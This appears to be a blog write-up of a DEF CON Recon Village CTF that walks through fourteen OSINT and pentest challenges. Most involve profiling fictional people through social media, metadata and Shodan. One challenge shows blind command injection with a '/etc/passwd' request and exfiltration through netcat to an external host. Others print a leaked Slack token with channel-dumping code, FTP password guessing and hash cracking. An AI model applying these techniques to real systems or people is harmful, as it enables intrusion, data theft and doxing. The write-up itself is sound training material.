Recon Village CTF Overview
Overview
So Black Hat and DEF CON have come and gone and it was great to catch up with old friends, make new ones, and be surrounded by individuals who share a passion for hacking.
VoidMOSity and I signed up for the Recon Village CTF (Team RFS) because many of the lines for DEF CON conference talks and events that were of interest to us were long and standing around seemed like a waste of time. We did not plan on this CTF taking up our remaining conference time, which it inevitably did, and we were hooked on the challenges within a couple hours. This was the first year DEF CON had a village for open source intelligence and reconnaissance tradecraft. The organizers who ran the village and CTF did an outstanding job. Overall, the CTF was well organized, competitive, and challenging.
Before we dive into the challenge walk-throughs, there were a few lessons learned that we would like to offer others that may be new to CTFs. Treat it like a real penetration test, which means take good notes, screenshots, and save tool output. We documented very little as neither of us thought we would place, let alone do a CTF write-up. We had to go back and re-document most of the challenges, which is why timestamps will be off in some of the tool output and screenshots. Another lesson learned is not participating in a CTF soon enough. This was my first time competing in a CTF and voidMOSity’s second. For those out there that have shied away from participating in CTFs, do it! They are a great way to expand skillset, as well as expose yourself to new challenges, which ultimately make you a stronger, more agile penetration tester (or defender, investigator, etc).
This CTF used Facebook’s open source CTF platform. Neither of us used this before, but we thought it was a fun way to go through a CTF. The competition consisted of 14 jeopardy style challenges ranging in various difficulties. Each challenge was associated with a country and points were broken down like so:
- Algeria: 200
- Libya: 200
- Congo: 100
- United States: 400
- India: 100
- Pakistan: 100
- Australia: 300
- Greenland: 500
- United Kingdom: 100
- Germany: 100
- Brazil: 200
- Bolivia: 200
- Argentina: 100
- Russia: 300
An additional 5 points were awarded to the teams who were the first to capture a country. Certain challenges allowed participants to request hints; however, points would be taken away if requested. Challenges were designed to test the participant’s technical proficiency in OSINT tradecraft, as well as penetration and web application testing.
Team RFS was the only team to solve all the challenges, while requesting no hints. Also important to note, if seriously competing, don’t expect much sleep as many of the teams were engaged both day and night. Neither of us got much sleep!
We have taken the time to document challenges to include applicable screenshots, scripts, and tool output. At the village closing ceremony, there were a number of individuals and teams who wanted to know how some of the challenges were completed. This post should hopefully answer those questions. I have presented in a way that a novice pentester or OSINT investigator should be able to digest and understand.
Challenge 1 — Algeria
Overview
Points: 200
Description:
HR dept was compromised through Phishing and Payroll data was stolen. Our investigation team dumped the pcap traffic for few machines which is attached. Help them find out the twitter [social media] handle of attacker.
Attachement: Challenge-4_42e6f673622d0b243f7bd8394acc96cb.pcap
Skills Required: Packet analysis, document metadata analysis, and Twitter OSINT.
Walk-Through
Because the attack involved phishing, it is not unreasonable to assume there was most likely a maldoc involved in the attack. There are several ways to analyze packet captures and carve out attachments, to include Wireshark and tools like Foremost. One note about Foremost is it will alter the file name when extracting the document, which could impact your investigation if it were a part of a clue or a lead. For those interested, there is a SANS white paper on extracting files from packet captures which details several different ways. We used Wireshark as the process is straight forward, easy, and does not modify contents of the file. The frame we’re interested in is #241 where we see a HTTP GET request from a wget user-agent string for the file OpenMe.docx
from 192.168.0.100 on TCP port 8000.
This is followed by frame #253 where we see the victim successfully receiving the file a from a malicious web server using Python’s SimpleHTTP module.
Wireshark makes file extraction very easy. Wireshark has an “Export Objects” function, which allows the analyst to export different file types to include DICOM, HTTP, SMB, and TFTP. In this scenario, HTTP is selected.
Regarding documents, it’s always important to look for potential data leakage via metadata. There are many tools out there to accomplish this task; however, we have found Phil Harvey’s ExifTool to consistently work with clean output.
Note that if this were a real investigation, we would need to produce the hash checksum, which would be run through resources like Virus Total and Malwr, and, detonating the maldoc in a controlled environment. In this case, it’s not required.
There are a number items that stick out in the above screenshot. We can see the file was created by HilalSchuurbiers21@gmail.com
and last modified by “Sudhanshu Chauhan”, who is one of the individuals that developed the CTF, so we can safely ignore.
As far as content, the document did not contain any actionable intelligence.
The objective for this challenge is to find the Twitter handle of the attacker. Search engines results were reviewed but data was not found to match this particular email address with a Twitter account. In order to match the email address with Twitter handle, Gmail was leveraged to import the email address as a new contact, followed by using Twitter’s “Find friends” functionality, which parses Gmail contacts and matches to a Twitter account. If the contact has registered a Twitter account under the Google contact email address, it will reveal the handle, the name, as well as profile picture and the bio of the account.
The twitter account handle i4mth4tculpri7
was the flag.
Challenge 2 — Libya
Overview
Points: 200
Description:
Profile the user identified in challenge 1 and find the building he’s been staying in. What does the building say?
Skills Required: Twitter, Instagram, and Google Maps OSINT.
Walk-Through
The Twitter and Instagram accounts for “i4mth4tculpri7” were manually analyzed for any actionable intelligence. There were a number of interesting tweets from June 22 through July 3, 2017, indicating the user may be in Amsterdam.
There was one specific tweet that appeared to contain actionable intelligence.
We know the location will be a hotel, the user will be targeting the company “x64corp”, and we have the GPS coordinates “52.3913066,4.8357588”, which can be run through utilities like Google Maps. A quick note on online mapping websites. It’s always a good practice to check multiple sources. I.e., Google Maps, Bing Maps, Mapillary, etc. Michael Bazzell has a great list here under “Maps”. This is important because many mapping websites will capture satellite and street view images at different times.
Before diving into Google Maps, The user’s Instagram account was reviewed for any posts of interests. Again, on July 3, 2017, the user posts another threat against x64Corp.
The coordinates “52.3913066,4.8357588” were imported into Google Maps.
Next, the location was analyzed using Google street view.
We can see that the building “Radarport” shares similar details with the building in the Instagram post, which concludes the challenge. The building name radarport
was the flag.
Challenge 3— Congo
Overview
Points: 100
Description:
Paul was System Admin at x64 Corporation. He had an argument with his manager and left the company few days back. Being disappointed, he started leaking sensitive data. He also deleted all the employee records. Help our investigators to find his Phone number.
Skills Required: Website archive OSINT.
Walk-Through
The primary website for x64Corp , which is hosted on GitHub servers, had contact information for only one Sys Admin, Roger Stone. The Git commit history was reviewed, but no useful information was identified.
Wayback Machine was leveraged to view an older archive of the website from June 21, 2017 and Paul’s phone number was identified.
The phone number 559811232121278
was the flag.
Challenge 4 — United States
Overview
Points: 400
Description:
Somone leaked company’s server information which lead to a serious hack.
Hacker left this signature. BrunoRochaAlvesFelipeAraujoGoncalves. And said: Find me by the gist. Remember hackers are anonymous.
Can you help us find what exact information was leaked?
Skills Required: GitHub Gist OSINT, and basic web application testing experience.
Walk-Through
By default, GitHub does not display anonymous posts on Gists and the anon:true
parameter must be used. The gist was identified using the exact search: anon:true BrunoRochaAlvesFelipeAraujoGoncalves
.
Closer inspection of this gist revealed a possible HTTP service running on IP address “13.56.108.41” on TCP port “8881”.
Accessing the server on the specified HTTP port showed the following message on the page.
The displayed message was taken as a hint as to the next steps. It appeared the index.php
file would be potentially capable of executing commands with the web page mentioning:
“My name is index. I will wait for your command.”
The static locations “/home/bob” were initially thought to be the location of the flag; however, later it was revealed these locations were not present on the server.
Next, several parameters were tested against the index.php
file in an attempt to get command execution and then have the output returned on the page. After attempting several variations of possible parameters, such as “command” or “cmd”, resulting in no visible command execution, Burp Suite was then used to take a closer look at the requests.
An initial request was captured in the Burp Suite proxy using the command
GET parameter and was then sent to the intruder module to run subsequent requests.
GET /index.php?command=cat%20/etc/passwd HTTP/1.1
Host: 13.56.108.41:8881
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Running several requests using the parameter command
with the Burp intruder module showed a response length of 299 bytes for each request.
However, after running the Burp intruder module using the parameter cmd
, resulted in 298 byte response lengths for each request.
This was an interesting observation and was the team’s realization that the command execution could be blind (I.e., no output being displayed on the web page). To test the theory, team members attempted another request to the server using the parameter cmd
with the value being sleep 10
. After executing, the web page appeared to sit and process this command for roughly 10 seconds, thus confirming that the command injection was blind.
Now knowing the command injection was blind, a way to receive the output of various commands was still needed. Attempting to execute commands like “wget” to fetch Internet based files and then watch for hits on the server side, resulted in no success; however, using DNS requests with the nslookup
or dig
commands did appear to successfully make it out to the Internet. One would think just using the “cat” command on the previously noted static files for the flag locations (/home/bob/flagpart1 and 2) and then just supply the output to the DNS requests might be the best way to exfiltrate the flags. Wrong! After several failed attempts blindly attempting to reveal the contents of these files, a new solution was needed.
We knew that DNS requests were allowed to egress the server, which would require UDP port 53. A netcat listener on UDP port 53 was then configured on an externally controlled server to receive any incoming traffic from the victim machine. The following command was used on the externally controlled server to accomplish this.
nc -unvlp 53
Back on the vulnerable web server, commands were attempted to be executed and then have their output sent to the netcat listener. After some further trial and error, the team came up with the following solution using netcat on the victim side.
<command to be executed> | nc –vnu <IP address of the external server> 53
Now listing the contents of the “flag” directory showed two files, “random.txt” and “useful.txt”. The flag was found contained in useful.txt
; surprise, surprise. 400 points in the bag!
Challenge 5— India
Overview
Points: 100
Description:
Dan has shared an IP 54.183.214.103 which he suspect that the hackers used to attack us. He was able to ping it few minutes back, but it’s not responding anymore- can you findout anything which might be helpful
Skills Required: Passive IP search engine OSINT.
Walk-Through
There are several websites to passively review information about IPs, to include SSL certificate information. Shodan was leveraged to review data on the IP address “54.183.214.103”. According to Shodan, TCP ports 80 and 443 were accessible.
The HTTP header response that Shodan was able to capture indicates the target enjoys photography and then points to a Flickr account handle bilalkharjilal337
, which is the flag for the challenge.
An additional observation was Censys captured even more information compared to Shodan. We can see the server also had a directory index available and served server.py, test.py, and test2.py.
Challenge 6— Pakistan
Overview
Points: 100
Description:
Can you find out the location of the hacker using the IP in challenge 5?
Skills Required: Flickr OSINT and EXIF photo metadata analysis.
Walk-Through
The Flickr account “bilalkharjilal337” was identified through searching the Flickr website, and found to contain only one photo. According to user supplied information on the profile, the user’s location was Beirut. Some EXIF information was present, but by default Flickr does not show all.
The same exiftool used earlier could be leveraged; however, we want to introduce another popular tool: Jeffrey’s Image Metadata Viewer. EXIF data was reviewed and additional metadata was uncovered to include GPS coordinates as seen below.
Jeffery’s tool is nice because not only are we getting clean output, but it is automatically mapping any identified GPS coordinates and displaying the location via Google Maps. If OPSEC is of concern, we recommend avoiding the use of online tools like Jeffery’s tool and sticking to exiftool or a similar local offline tool.
The flag for this challenge is the GPS coordinates.
Another utility that is worth mentioning is Ghiro. Ghiro is a photographic forensic tool that will perform the same functionality as exiftool and Jeffery’s tool and much more to include error level analysis to look for photo manipulation.
Challenge 7— Australia
Overview
Points: 300
Description:
Our company dosn’t spend a lot on paid products, and we use a lot of open source / free products. For example we use git for version controlling — https://github.com/x64Corp
Since teams don’t use any centralized chat system, it’s difficult to monitor the same. Our CTO suspects that someone is keeping an eye on our discussions. Not sure how.Can you help?
Skills Required: Slack OSINT, Python scripting, and basic knowledge of Slack API.
Walk-Through
The Github link provided in the challenge was used to begin looking for possible clues about how someone might be able to keep an eye on x64Corp employee discussions. After looking through the various repositories in the provided Github link, it was observed that two individual accounts were a part of the x64Corp organization, “jrianjack” and “malakhshou”.
After visiting these user profiles and searching through the various repositories they had contributed to, an interesting project called private_server was identified connected with the “malakshou” account, more specifically this project was noted to contain x64Corp’s internal Slack configuration files.
Taking a look at the appengine_config.py
file in the most recent revision included several placeholders for adding Slack API keys, however none of the values were filled out.
Upon further inspection of this repository, it was observed that several iterations of this file were present in the commit history, which at one point in time did contain a Slack API token within the configuration. Slack would be a good way to monitor internal discussions if the API token was known.
With the Slack API token now known, team members began working a solution to query various aspects of the API using some quick Python code. The slackclient Python module was downloaded to perform these tasks.
After running a few initial API calls with the slackclient Python module to gather details about the available channel IDs, the following Python code was used to dump the channel history.
import os
from slackclient import SlackClientslack_token = "xoxp-204882332822-203523130257-204081355250-8200a7efb0bec7fbd5894bf09bc7ab08"
sc = SlackClient(slack_token)
print "Channel list------------------------------------"
print sc.api_call("channels.list",exclude_archived=0)
print "Channel list------------------------------------"
print "Channel info------------------------------------"
print sc.api_call("channels.info",channel="C60RY9W8N")
print "Channel info------------------------------------"
print sc.api_call("users.list")
print "Channel Messages----------------------------------"
print sc.api_call("channels.history",channel="C60RY9W8N")
This Python code was then run, which returned the entire channel history in JSON data where the flag was then identified.
Challenge 8— Greenland
Overview
Points: 500
Description:
I own 13.56.108.41. I don’t trust people.
I play with malwares. Hack my servers. bwhaha!
Skills Required: IP search engine OSINT, Pastebin OSINT, Twitter OSINT, Facebook OSINT, basic knowledge of FTP.
Walk-Through
The Greenland challenge was a lot of fun and one of the more difficult challenges as participants were not given much information other than a starting IP address with no clear indication what the flag could potentially be.
Shodan was used to passively analyze the host, which provided a good lead.
The output shows a web server hosted with a SSL certificate that included the email address “Rafaela.Pereira@x64-corp.com” and what appears to be an internal hostname “prod02.x64-corp.com” in the certificate CommonName; we can conclude this is most likely a production system for x64Corp.
Michael Bazzell’s paste search tool, which uses a Google custom search engine to search 57 known paste sites was leveraged to run the email address “Rafaela.Pereira@x64-corp.com” through.
Two results were identified. The first result, which was uploaded July 19, 2017, was of interest as it contained information about the person of interest being doxed.
Information included the email address, date of birth, and a Twitter handle. The Twitter account was immediately reviewed.
One takeaway from the Twitter account is the profile picture. The URL was passed through Google’s reverse image search.
The profile picture was taken from the 1953 science fiction movie Donovan’s Brain. It’s always important to note connections like this when conducting OSINT investigations as it tells us more about the user.
One nice feature about Facebook search functionality is it allows the investigator to query via email address. Facebook revealed Rafaela’s profile, which also contained the same profile picture.
One important note to point out is the profile contains the nickname donovan. A previous tweet had mentioned the following statement, which appears to be of value based on this new information:
what’s in a nickname…am I right?
The Facebook profile contained several items of interest on the Timeline. On July 20, 2017, Rafaela mentioned an interest in security with a focus on malware. Cuckoo, which is an automated sandbox application for analyzing malware is specifically mentioned.
Another interesting post from the same day:
This post and reply will play a major role in the challenge, so be sure to take note. The Spanish translates to:
“The job is monitoring Linkedin, so I’m going to empty the data here”
Rafaela has followed up to the post with the reply:
??42|french|MONDAY|type|EXPECT|were|TEACHER|82??
Digging deeper into the profile, we can see a malformed or invalid URL in the account “Overview” under the “About” section.
Lastly, the account “Details” section shows a reference to Malwr, which is a hosted Cuckoo solution, as well as a what appears to be a hash and the account nickname “donovan”.
All the data outlined above was collected and put through a search engine to see what new leads could be identified, while simultaneously following up with malwr.com. Google search for The malformed URL “MjEyM2U1MmIzM2JmNDYzNTk5YmQ5YWNiOGRkMDNjNmU” revealed a direct link to the Malwr entry. Additionally, the hash “ecdba596e0ba8e3ec0f3147980ed22faf0fcf020” could also have been used for the search term as Google will collect all data from Malwr submissions.
The Malwr submission was a filename called “5.jpg” and was uploaded July 19, 2017, so it aligned with the timing of the Facebook post activity.
The “5.jpg” file was downloaded and uploaded to Jeffrey’s Image Metadata Viewer, which successfully extracted all Metadata.
The metadata file description contained a base64 encoded string, which Jeffery’s tool automatically decoded to “fifty-two.nine.sixty-five.two-twenty-five”, or “52.9.65.225”. Also note the user comment of “eff-tee-pee”. Censys was then leveraged to passively view port information for the IP address.
Censys confirmed there was an FTP server listening on the port. A FTP client was used to connect to the hosts followed by manual passwords guessing. We assumed the username would be “donovan” based on intel Rafaela has provided. In the end, the password was the string “??42|french|MONDAY|type|EXPECT|were|TEACHER|82??” which was mentioned in a Facebook reply.
As seen above, a directory listing revealed a file named “flag.txt”, which was downloaded and printed revealing the contents Amidst the mists and coldest frosts he thrusts his fists against the posts and still insists he sees the ghosts
.
This was the last challenge we completed and getting the 500 points put us at the top and with only 1 hour left on the clock!
Challenge #9— United Kingdom
Overview
Points: 100
Description:
Our CTO (zakjohnson_1980) somehow leaked sensitive keys.
Skills Required: Twitter OSINT, ASCII decoding, and AES decryption.
Walk-Through
The Twitter account mentioned in the challenge description was identified and reviewed. One of the first things of interest was the QR code for the Twitter profile picture.
The QR code URL was imported into an online QR decoder tool resulting in a gist link.
The gist URL was recently submitted by an anonymous user and contained two items of interest.
The first string was recognized as ASCII and Burp Suite was used to decode and reveal “uuuuuuiiiiii”.
Next, an AES decryption website was leveraged to import the decoded key “uuuuuuiiiiii” and decrypt “JZ5xVbdrIjWL1Cj2hNs+kKU7pBr49a+lWZcMBmdkagM=” revealing the flag Sup3rS3cr3tk3y@3221
.
Challenge 10— Germany
Overview
Points: 100
Description:
Find the IP Address of the Netweaver Application that runs on an apache server and sits in Switzerland
Skills Required: Shodan OSINT.
Walk-Through
Shodan was used to search for “Netweaver”, with the Switzerland country abbreviation “CH”, and “Apache”. The exact search query string was: netweaver country:ch product:apache
.
The flag was the IP address 91.212.75.227
.
Challenge 11 — Brazil
Overview
Points: 200
Description:
Company x64-corp has received an email which says:
Hi,
This bad chap out there tracks leaked info. He got some info about us too and leaked that same. http://ow.ly/Zx8y30e0EKuCan you help us identify the info he’s leaked.
Skills Required: Basic knowledge of zip and 7zip, and Pastebin OSINT.
Walk-Through
A URL shortener analyzer was used to inspect the ow.ly link and was found to be pointing to a directory on Google Drive.
The Google Drive location “whose_data” contained a .zip and .7z files.
The .7z file “this_data.7z” was encrypted and password protected; however, the .zip file “why_data.zip” was a normal compressed file, which was decompressed and yielded a text file named “what_data”.
The contents of “what_data” were assumed to be the decryption password for “this_data.7z”, which was successfully decrypted and resulted in a new text file named “S3cr3tp4st3dum9” containing sixteen pastbin.com URLs.
Content for all pastinbin.com URLs were analyzed with only one containing actionable intelligence.
This post appeared to be the leaked data the challenge description referred to. All unique terms on the page were submitted as flags with gue55wh4therei5theflag.x32corp.org
being the flag.
Challenge # 12 — Bolivia
Overview
Points: 200
Description:
Great, you found something in challenge 11, but are they really usable or just another bunch of garbage?
Skills Required: Identifying hashes, and cracking hashes.
Walk-Through
In challenge 11, nine hashes were found leaked and identified as SHA1.
Before using a password cracking rig, an online SHA1 hash cracker was checked to identify any pre-cracked hashes, resulting in the hash “4642e9dd8056bb057056bf75a73f74600e1f8e7b” being on the list. The flag for the challenge was notthisone
.
Challenge # 13 — Argentina
Overview
Points: 100
Description:
Cracked password in challenge 12? seems useful? Really?
Skills Required: Hash cracking.
Walk-Through
The team assumed additional hashes would need to be cracked. While a dictionary password attack using hashcat chewed through the hashes, various online hash crackers were checked. There was one online hash cracker that had the plain-text password for the hash “b2399b0109bfc8090a51d7098367512fb7e5d9ec”. The flag was notthisone2
.
Challenge # 14 — Russia
Overview
Points: 300
Description:
Solve the Reccon Village Badge Challenge and help us find the username of the hacker.
Skills Required: Identifying ciphers.
Walk-Through
The Russia challenge involved browsing various ciphers on image repositories like Google Images.
While browsing ciphers, we came across one cipher that looked identical. Here’s the original source for the image.
Using this chart, the cipher was decoded using the “Cipher 1” value set. The flag was git:jamescru001
.
Concluding Remarks
For the last couple of years, OSINT has become an obsession for me and it is something I take very seriously when conducting red team operations and penetration tests for my day job. I am excited that events like Recon Village are popping up, as I feel OSINT deserves much more recognition. It was great to see people who share a passion for OSINT come together and I expect great things from this village in the years to come. I do hope the folks running DEF CON provide more space for the village next year as it was difficult to attend many of the talks. For those interested, my understanding is the videos will be posted online in the near future.
My only advice on CTF improvements would be more difficult challenges like United States, while still including OSINT requirements, and additional chained investigation challenges like Greenland. These two challenges were our favorites. Australia was also a lot of fun!
A huge thank you to all the people who competed in this year’s Recon Village CTF! We would also like to thank all the sponsors for investing in the village. Without their support, this village and CTF would not have been possible. Thanks for the sweet drone, Hak5 WiFi Pineapple kit, and Maltego and Hunchly licenses!
If anyone has any feedback (good or bad), questions, or needs additional clarification on any of the challenges, please do not hesitate to comment below.
Thanks for reading!